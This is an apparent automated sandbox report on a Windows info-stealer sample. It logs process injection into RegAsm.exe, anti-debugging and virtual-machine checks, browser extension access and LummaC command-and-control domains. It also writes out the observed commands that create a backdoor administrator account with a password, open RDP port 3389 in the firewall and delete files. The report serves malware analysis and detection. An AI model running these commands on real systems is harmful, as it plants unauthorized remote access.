Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00410FBA GetSystemInfo,wsprintfA,

2_2_00410FBA

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\AFHDGDGIID.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033BE000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 00000028.00000002.2610262842.0000000002F98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Administrators
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: net1.exe, 00000028.00000002.2610262842.0000000002F98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administratorsjevl
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: RegAsm.exe, 00000002.00000002.2452955008.000000000077A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWxZ~%SystemRoot%\system32\mswsock.dll
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWl
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW"
Source: AFHDGDGIID.exe, 0000000C.00000002.2651790649.000000000122D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareQL
Source: net1.exe, 00000028.00000002.2610262842.0000000002F98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_2-79986
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_2-80002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_2-81317

Source: C:\Windows\System32\drivers\tsusbhub.sys

System information queried: ModuleInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004476D0 LdrInitializeThunk,

8_2_004476D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_0041D016

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_00418950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004014AD mov eax, dword ptr fs:[00000030h]	2_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040148A mov eax, dword ptr fs:[00000030h]	2_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004014A2 mov eax, dword ptr fs:[00000030h]	2_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00418599 mov eax, dword ptr fs:[00000030h]	2_2_00418599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041859A mov eax, dword ptr fs:[00000030h]	2_2_0041859A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,

2_2_0040884C

Source: C:\ProgramData\AFHDGDGIID.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042762E SetUnhandledExceptionFilter,	2_2_0042762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C11B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6C11B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C11B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C11B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2CAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C2CAC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 396, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02D4212D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02D4212D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop
Source: IDBAFHDGDG.exe, 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wallkedsleeoi.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 33B008	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 610008	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 936008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\IDBAFHDGDG.exe "C:\ProgramData\IDBAFHDGDG.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIIIIJDHJE.exe "C:\ProgramData\GIIIIJDHJE.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\AFHDGDGIID.exe "C:\ProgramData\AFHDGDGIID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFBKFHIDHIIJ" & exit	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\AFHDGDGIID.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\ProgramData\AFHDGDGIID.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_fec8106a DlRcmVQWc0I6 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_fec8106a DlRcmVQWc0I6 /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_fec8106a /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_fec8106a /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_fec8106a /add

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040111D cpuid

2_2_0040111D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	2_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	2_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	2_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	2_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	2_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	2_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	2_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	2_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	2_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	2_2_0042B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	2_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	2_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_00427576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	2_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	2_2_0042E6A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\IDBAFHDGDG.exe	Queries volume information: C:\ProgramData\IDBAFHDGDG.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\GIIIIJDHJE.exe	Queries volume information: C:\ProgramData\GIIIIJDHJE.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\AFHDGDGIID.exe	Queries volume information: C:\ProgramData\AFHDGDGIID.exe VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,

2_2_0041C0E9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

2_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

2_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

